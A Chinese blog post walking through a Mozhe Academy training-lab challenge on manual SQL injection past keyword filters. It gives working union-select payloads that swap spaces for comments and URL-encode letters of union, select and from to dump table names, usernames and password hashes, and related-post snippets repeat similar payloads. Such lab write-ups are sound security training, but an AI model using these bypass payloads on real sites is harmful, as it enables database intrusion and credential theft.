墨者学院----SQL过滤字符后手工注入漏洞测试(第2题)

最新推荐文章于 2022-10-03 23:16:05 发布
最新推荐文章于 2022-10-03 23:16:05 发布
阅读量406 收藏 1
点赞数 1
分类专栏: 墨者学院靶场 文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43590351/article/details/112873969
版权

SQL过滤字符后手工注入漏洞测试(第2题)

按照基本流程我们在url中输入单引号报错,说明存在SQL注入。直接输入order by发现页面异常,可能被过滤
尝试利用==/**/空格==进行绕过

?id=1/**/order/**/by/**/4

页面正常说明字段数为4,且order by没有被过滤
接下来利用联合查询,看是否有回显点
输入语句
?id=-1//union//select/**/1,2,3,4发现报错,判断union和select可能被过滤。
我们可以做尝试,把union和select关键字进行url编码在试试效果。

?id=-1/**/%75nion/**/%73elect/**/1,2,3,4

发现页面正常,说明我们推测正确关键字被过滤可以编码绕过(全部编码也可以)
爆出回显位是2和3
在这里插入图片描述
接下来利用老套路进行爆破数据库,表,字段,字段内容。

爆库

?id=-1/**/%75nion/**/%73elect/**/1,database(),3,4

根据页面回显知库:mozhe_discuz_stormgroup

爆表 notice,stormgroup_member
输入原始语句发现页面报错,猜测可能from也被过滤from的url编码==%66%72%6f%6d==

-1/**/%75nion/**/%73elect/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'mozhe_discuz_stormgroup',3,4

接下来对from进行url编码后得SQL语句

-1/**/%75nion/**/%73elect/**/1,group_concat(table_name),3,4/**/%66%72%6f%6d/**/information_schema.tables/**/where/**/table_schema/**/like/**/'mozhe_discuz_stormgroup'

页面成功回显出表名,因此from也被过滤
在这里插入图片描述

爆字段 id,length,name,password,time,status

-1/**/%75nion/**/%73elect/**/1,group_concat(column_name),3,4/**/%66%72%6f%6d/**/information_schema.columns/**/where/**/table_schema/**/like/**/'mozhe_discuz_stormgroup'/**/and/**/table_name/**/like/**/'stormgroup_member'

在这里插入图片描述
爆字段值

-1/**/%75nion/**/%73elect/**/1,group_concat(name,password),3,4/**/%66%72%6f%6d/**/stormgroup_member

在这里插入图片描述

mozhe01d1bff12cf951bbb9f8d1c3e59620255b
mozhe2a6babd9eb561e9ffd6f5aad28851daa7
admin6aa9483f549c490877c01a5baa521371
最后进行MD5解密即可
这里过滤了空格,关键字select,union,from等
方法二:利用Sqlmap进行探测
具体方法可见我的另一个博客

https://blog.csdn.net/qq_43590351/article/details/112855088
这第二题我感觉和第一题解法一样,感觉被骗了,还我墨币啊啊啊啊啊啊啊

萌新_大鹏鸟
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
在线靶场-墨者-WEB安全2星-表单暴力破解实训(第2)
weixin_42079912的博客
08-09 755
点开靶场网页,输入用户名admin,密码123,验证码照着网页的输入。打开浏览器代理。开启Burp Suite,点击网页Login,开始抓包。由于验证码在Cookie中,不刷新验证码的话,短时间内验证码不会改变。 于是把抓到的数据包右键send to Intruder。先点击Clear清楚变量。然后选择password后面的123再点击Add,是123变成变量。 然后选择Payloads。根据...
墨者学院SQL过滤字符手工注入漏洞测试(第2)
没事我溜达
03-19 2237
过滤了空格、union、and、select等数据库查询关键字符
墨者 - SQL过滤字符手工注入漏洞测试(第2)
吃肉唐僧的博客
07-11 635
一开始直接用order by 测试,被拦截 后来试着绕过,空格用/**/代替,=用like代替 可以绕过,成功执行 测试到字段有4个,用union select 1,2,3,4 发现被拦截无法执行,猜想是拦截了关键字,试着把关键字段得某个字母转编码 /**/and/**/1/**/like/**/2/**/%75nion/**/%73elect/**/1,2,3,4 执行成功 ...
SQL过滤字符手工注入漏洞测试(第2)——<墨者学院漏洞记录>
chick11的博客
07-16 213
http://219.153.49.228:40519/new_list.php?id=1 http://219.153.49.228:40519/new_list.php?id=1' http://219.153.49.228:40519/new_list.php?id=1'%23 http://219.153.49.228:40519/new_list.php?id=1' and 1=1 经过上面几轮测试,可以看出本:空格,单引号,等号,union,select,from都过滤。 因此进行替换:
墨者SQL过滤字符手工注入漏洞测试(第2)
wswr的博客
03-14 1199
思路:这相比较前一提的难点就是,你它到底过滤了啥,虽然说这个是难点,但是同时也是最无所谓的难点,毕竟,我就算不知道具体过滤啥,我还是该试的都试试,记得上提是用url编码然后绕过,那延续过来这行不行呢,然后你会发现,好像确实可以,emm,那好像真就和第一没什么大区别就算啦。(PS:上的思路就是用URL编码绕过检测) 总结一下:和上没什么区别,上懂了这一样的操作马上解决 那么就快速过一遍了(列还是4,回显点是2,3) 老样子查数据库查版本 /**/union/**/select/**/1,
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
通关攻略墨者靶场 post ,DB2,绕过登录,sql注入四关
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
2. **攻击**:攻击者可能会利用SQL注入、XSS(跨站脚本)或其他方法来注入恶意代码,然后在服务器端执行。 3. **检测**:通过静态代码分析、动态运行时检测和漏洞扫描工具,可以发现潜在的代码执行风险。 4. **危害*...
SQL过滤字符手工注入漏洞测试(第2)
weixin_47493074的博客
10-03 205
SQL过滤字符手工注入漏洞测试(第2)
表单暴力破解实训(第2)
jeehoon的博客
11-13 499
首先随机输入一个密码,用户admin,然后通过bp抓包,发现cookie里含有验证码,说明如果不放这个包,验证码一直都不会改变,然后直接放入爆破模块,设置三位数密码 可以看到密码是335 ...
表单暴力破解
weixin_47493074的博客
09-19 155
表单暴力破解
墨者学院 - SQL手工注入漏洞测试(Sql Server数据库)
多崎巡礼的博客
07-27 6894
手工SQL注入过程,数据库执行的语句,是页面提交至服务器应用程序,应用程序获取id的值,然后把值拼接到查询语句中,在到数据库中查询,通过程序解析后,把结果返回在页面上,(使用时请将mozhe.cn替换成对应的靶场地址)。 开启靶场环境: 第1步: 页面提交:http://mozhe.cn/new_list.php?id=2 数据库执行语句:select * from manage w...
墨者学院 SQL过滤字符手工注入漏洞测试(第3)
a519395243的博客
12-21 1443
 手工注入 墨者学院 SQL过滤字符手工注入漏洞测试(第3) 使用sqlmap 跑,跑不出表名,所以手工注入 点击进去靶场 域名url为:   http://219.153.49.228:41774/new_list.php?id=1   第一步:判断是否有注入点     http://219.153.49.228:41774/new_list.php?id=1'    出...
墨者学院 - SQL过滤字符手工注入漏洞测试(第1)
多崎巡礼的博客
09-28 2680
一开始怎么加字符都不行,才发现应该是检测到我注入以后跳转了; (过滤了空格和一些常规查询字符,“+”号也过滤了,大小写不能绕过那就URL编码吧) 和以往的套路一样,猜得到字段是4个。。。 http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,database(),version(),4 url编码构造如...
墨者学院-SQL手工注入漏洞测试(MySQL数据库)
多崎巡礼的博客
07-26 3244
很简单,可以完全参照 https://blog.csdn.net/qq_42357070/article/details/81215715 进行解 以下用cms站点举例: https://pan.baidu.com/s/1uiO2cqZCGquQqyYWr0C7WQ     提交and 1=1 返回内容正常        And 1=2 返回内容为空 确定存在注入漏...
墨者 - SQL过滤字符手工注入漏洞测试(第1)
吃肉唐僧的博客
07-04 1326
一开始使用order by,union select ,and 字段,发现返回并没有变化。 推测这些字段是已经过滤掉了 后来,上网查询后发现 ,不但这些字段过滤,还有空格和‘=’也被过滤掉了 所以‘=’可以用Like 替代,空格用/**/,url 要编码转义 在这里有个坑,花了我不少时间 一般url都是用在线url解码,例如:https://tool.chinaz.com/tool...
墨者学院 - SQL注入漏洞测试(POST)
多崎巡礼的博客
08-20 5347
和最开始拿到sql注入不一样,注入点不再是公告了,二是登陆页面的账号栏,简单的语句就能得到错误回显 根据目提示,post请求 1)随便输入用户名和密码,然后使用 burp抓取登录界面的post包,保存为txt; 2)将txt放在sqlmap目录下; 3)打开sqlmap,使用post注入sqlmap.py -r 文件路径/文件名 --dbs  //证明可以注入,且获取所有数据库名...
墨者-sql手工注入漏洞测试
04-29
在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值